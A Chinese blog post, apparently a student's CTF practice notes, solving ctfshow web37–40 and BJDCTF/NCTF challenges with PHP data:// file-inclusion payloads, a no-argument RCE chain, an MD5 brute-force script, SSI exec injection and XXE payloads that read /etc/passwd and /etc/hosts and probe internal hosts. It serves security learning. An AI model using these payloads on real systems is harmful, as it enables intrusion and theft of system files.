1.30 刷题

最新推荐文章于 2022-05-18 19:32:29 发布
最新推荐文章于 2022-05-18 19:32:29 发布
阅读量683 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lumos427/article/details/113447321
版权

ctfshow web入门 命令执行

web37
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    } 
}else{
    highlight_file(__FILE__);
}

这里用了include文件包含,代码不能直接执行我们传入的命令,要用伪协议读取,但是过滤了flag,就不可用php://filter

?c=data://text/plain,<?php system('cat f*');?>
web38
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

这里就比上一题多过滤掉里php和file,将php语句里面的php用短标签代替,就可得到flag,这里也可以用base64编码绕过

?c=data://text/plain,<?= system('cat f*');?>

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=
web39
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

这里在文件包含里面加了个php

?c=data://text/plain,<?= system('cat f*');?>

就是当我们读取flag这个文件里面的内容时,后面会有个.php

web40
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

这里过滤掉了所有的数字和符号,记得之前做了一个无参数rce的题,这个好像也是

相关函数

localeconv() 函数返回一包含本地数字及货币格式信息的数组。
scandir() 列出 images 目录中的文件和目录。
readfile() 输出一个文件。
current() 返回数组中的当前单元, 默认取第一个值。
pos() current() 的别名。
next() 函数将内部指针指向数组中的下一个元素,并输出。
array_reverse()以相反的元素顺序返回数组。

查询根目录:

print_r(scandir(current(localeconv())));

我们要读取倒数第二个文件中的内容,先用array_reverse函数进行逆序,再用next函数读取flag.php

highlight_file(next(array_reverse(scandir(current(localeconv())))));

[BJDCTF2020]EasySearch

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)
        print(a)
//2020666 用这个为密码登录

成功之后在网络的响应头找到了一串url

访问网址,搜索shtml漏洞,搜出来ssi注入漏洞

[]: https://blog.csdn.net/qq_40657585/article/details/84260844 “ssi注入漏洞”

我们可以利用下面执行我们的命令执行命令

④直接执行服务器上的各种程序<#exec>(如CGI或其他可执行程序)**

<!–#exec cmd="文件名称"–>

<!--#exec cmd="cat /etc/passwd"-->

<!–#exec cgi="文件名称"–>

<!--#exec cgi="/cgi-bin/access_log.cgi"–>

将某一外部程序的输出插入到页面中。可插入CGI程序或者是常规应用程序的输入,这取决于使用的参数是cmd还是cgi。

<!--#exec cmd="ls /"-->                 //查看根目录


<!--#exec cmd="ls"-->                     //查看当前目录


<!--#exec cmd="ls ../"-->             //查看上级目录


<!--#exec cmd="cat ../f*"-->

[NCTF2019]Fake XML cookbook

在源码中发现了以下的php源码

function doLogin(){
	var username = $("#username").val();
	var password = $("#password").val();
	if(username == "" || password == ""){
		alert("Please enter the username and password!");
		return;
	}
	
	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    }); 
}

抓包这里看到username和password都是xml格式,接下来增加我们自己的恶意实体,读取/etc/passwd文件

XXE漏洞:XML实体注入漏洞
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> 称为 XML prolog ,用于声明XML文档的版本和编码,是可选的,必须放在文档开头。

<!DOCTYPE note [<!--定义此文档是 note 类型的文档-->

DTD实体

实体是用于定义引用普通文本或特殊字符的快捷方式的变量。
实体引用是对实体的引用。
实体可在内部或外部进行声明。

按实体有无参分类,实体分为一般实体和参数实体
一般实体的声明<!ENTITY 实体名称 "实体内容">
引用一般实体的方法:&实体名称;
ps:经实验,普通实体可以在DTD中引用,可以在XML中引用,可以在声明前引用,还可以在实体声明内部引用。

参数实体的声明<!ENTITY % 实体名称 "实体内容">
引用参数实体的方法:%实体名称;
ps:经实验,参数实体只能在DTD中引用,不能在声明前引用,也不能在实体声明内部引用。
DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。

按实体使用方式分类,实体分为内部声明实体和引用外部实体
内部实体

<!ENTITY 实体名称 "实体的值">

内部实体示例代码:

<?xml version = "1.0" encoding = "utf-8"?>
<!DOCTYPE test [
    <!ENTITY writer "Dawn">
    <!ENTITY copyright "Copyright W3School.com.cn">
]>
<test>&writer;©right;</test>

外部实体
外部实体,用来引入外部资源。有SYSTEMPUBLIC两个关键字,表示实体来自本地计算机还是公共计算机。

<!ENTITY 实体名称 SYSTEM "URI/URL">
或者
<!ENTITY 实体名称 PUBLIC "public_ID" "URI">

外部实体示例代码:

<?xml version = "1.0" encoding = "utf-8"?>
<!DOCTYPE test [
    <!ENTITY file SYSTEM "file:///etc/passwd">
    <!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
]>
<author>&file;©right;</author>


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

这样尝试查看目录下的flag

[NCTF2019]True XML cookbook

跟Fake XML cookbook一样的登陆页面

这里也是XXE漏洞:XML实体注入漏洞

抓包后添加外部实体漏洞,读取/etc/passwd

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>

<user><username>&admin;</username><password>123546</password></user>

按照之前做的那题,先直接查找根目录下面的flag文件,但是没有正确文件的回显,,看了wp,发现这里应该要进行主机查询,读取/etc/hosts文件,但是我的bp就没有还存活的主机,换了一个bp还是没有,感觉这里应该是题目环境的问题,先看别人的wp学习一下

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/hosts">
  ]>

<user><username>&admin;</username><password>123546</password></user>

读取/etc/hosts文件

img

看到内网有存活的主机,尝试访问

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "http://173.241.204.10">
  ]>
 
<user><username>&admin;</username><password>123546</password></user>

img

在173.241.204.11主机处发现flag

img

K3NJ
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
flag就在flag.php,flag就在flag.php中
weixin_35355431的博客
03-11 2194
Web1目地址1.访问目存在一个登录界面2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示3.访问flag.php,试试可不可以得到flag提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的4.抓包发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密之后的在登录成功跳转的那个页面还有一个修改密码的...
fileinclude (攻防世界web)
qq_53099119的博客
10-01 1462
接下来构造payload,使用filter伪协议来读取flag.php的源码: payload: language=php://filter/convert.base64-encode/resource=/var/www/html/flag 注意,由于在源码分析中,对lan最后拼接了“.php”,因此在payload中flag后不用加。 执行后即可获得flag的base64编码。
【CTFshow】命令执行web29-web54
weixin_51614272的博客
02-23 2510
web29 源码 if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } eval函数,把GET方法获取的变量c内容,当做命令去执行 过滤了flag关键字,不区分大小写 构造payload: ?c=system("tac fla?.php"); ?c=system("t
ctfshow web入门命令执行部分(更新至56)
L1ni01
10-16 3087
ctfshow web 入门 命令执行部分 web29 源码 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } payload:c=system('cat f*'); 匹配任何字符串/文本,包括空字符串;
CTFshow_命令执行
qq_45927819的博客
11-20 1248
文章目录web29 web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag get方式传参: ?c=system(ls); 发现flag.php 直接查看就行: ?c=system('cat ')
MyTopix v1.30 简体中文版.zip
06-18
MyTopix v1.30 是一个专门为中文用户设计的信息聚合软件,它的简体中文版使得国内用户可以更方便地浏览、管理和定制自己的新闻与兴趣话。这个版本的发布,旨在提供一个用户友好的界面和高效的信息获取工具,帮助...
Shader Forge v1.30
12-23
最新版 Shader Forge v1.30 保证质量 良心资源
VB上位机Ver.1.30
05-24
VB上位机Ver.1.30VB上位机Ver.1.30VB上位机Ver.1.30VB上位机Ver.1.30VB上位机Ver.1.30VB上位机Ver.1.30VB上位机Ver.1.30VB上位机Ver.1.30VB上位机Ver.1.30VB上位机Ver.1.30VB上位机Ver.1.30VB上位机Ver.1.30VB上位机...
FSF v1.30 超级论坛
10-13
【FSF v1.30 超级论坛】是一个基于网络的互动平台,专为IT专业人士和爱好者设计,提供了一个集技术交流、资源分享、问解答于一体的在线社区。FSF,全称可能是“Free Software Foundation”(自由软件基金会)的...
MarkMan1.30
01-25
**MarkMan 1.30:一款强大的图像像素测量工具** **软件介绍** MarkMan 1.30 是一个专为设计师和开发者打造的高效工具,用于精确测量图像中的像素。这款软件支持MAC和iOS平台,是进行界面设计、网页设计、图标设计...
ctf bugku 变量1
qq_35191331的博客
08-12 3544
flag In the variable !  error_reporting(0); // 关闭php错误显示 include "flag1.php"; // 引入flag1.php文件代码 highlight_file(__file__); if(isset($_GET['args'])){ // 通过get方式传递 args变量才能执行if里面的代码     $args
Bugku CTF web2
qq_61768489的博客
04-12 3719
source 先dirsearch扫,发现.git 泄露 上工具 ,git_extract ,直接就把flag文件下好了 文件包含 提示index.php ,也给了get,可能flag就在这里面 用伪协议读取就可 /index.php?file=php://filter/convert.base64-encode/resource=index.php 备份是个好习惯 扫了一波,备份是 index.php.bak 下载下来后把后缀修改成php 才能看见源码 .
2020Xpoint新生杯(部分writeup)
weixin_46938584的博客
11-11 1308
真签到 扫二维码回复信息得到flag。 假的签到 1、提示robots.txt。 2、又提示进入phpp_tql.php,得到如下源码。 <?php highlight_file(__FILE__); $phpp=$_GET['phpp']; $hphh=$_GET['hphh']; if (md5($phpp)===md5($hphh) and $phpp!==$hphh ){ highlight_file('flag.php'); }else{ echo 'PHP 彳亍'."
命令行解析:flag
c359719435的专栏
12-12 1912
一般使用在写命令行程序(工具、server)时,对命令参数进行解析是常见的需求。Go的命令行参数解析通过flag包实现,先看下面这个例子,假设我们实现了一个server,启动这个server的时候需要指定监听的tcp地址(例如:127.0.0.1:1314)、配置文件、监听的http地址(例如:127.0.0.1:6666)。启动命令如下: ./server -tcpAddr 127.0.0.1
ctfshow web入门 命令执行
qq_50589021的博客
10-07 2731
命令执行 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } ?> 考点: 绕过特殊字符的过滤 payload: ?c=system('ls');//flag.php index.php ?
CTFshow 命令执行 web38
Kradress的博客
10-30 161
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:23:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ //flag in flag.php error_reporting(0); if(
连异常报错也能拿到flag?
蚁景网安学院
10-15 726
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客极客技术、信息安全热点安全研究分析等安全相关的技术文章稿件通过并发布还能收获200-800元不等的稿酬前言:...
ctfshow web入门 php特性
Sentiment的博客
04-11 5277
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
CTFHub 技能树rce
weixin_63231007的博客
05-18 1164
前言 最近临近期末考试了,所以打算抽取时间来复习一下高数,线代,不然就要挂科了😭 后面难一些的地方后面再继续练习学习。但是学习也不能停搁,周六学校的战队也要进行纳新面试了,因此那就借CTFHub技能树,综合做一下刚开始学习时的一些基础漏洞,也算是回顾复习一下🐱‍👤 (1) eval执行 eval()函数 eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行 <?php if (isset($_REQUEST['cmd'...
concave collider 1.30
最新发布
09-08
Concave Collider 1.30是Unity3D游戏引擎中的碰撞器组件版本。碰撞器是游戏中用来检测物体之间碰撞的组件,用于模拟物理交互和碰撞反应。 Concave Collider指的是具有凹面功能的碰撞器。通常,Unity中的碰撞器都是凸面的,即形状是凸出的,而凹面则是形状有凹陷的。凹面碰撞器可以更好地模拟包围物体的形状,使碰撞检测更加准确。 从版本号1.30可以看出,这是一个相对较新的版本。Unity经常会更新引擎和各种组件,以改进性能、修复错误和添加新功能。因此,Concave Collider 1.30可能是之前版本的补丁或更新,目的是改进凹面碰撞器的功能和性能。 通过使用Concave Collider 1.30,开发者可以更好地模拟物体的真实形状,并实现更真实的碰撞效果。这对于需要在游戏中进行精确碰撞检测的场景非常有用,例如角色与环境的碰撞、物体之间的互动等。 总之,Concave Collider 1.30是Unity中的一个组件版本,它为开发者提供了更准确的凹面碰撞器,用于模拟物体之间的碰撞反应,并且可能包含了一些性能优化和功能改进。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值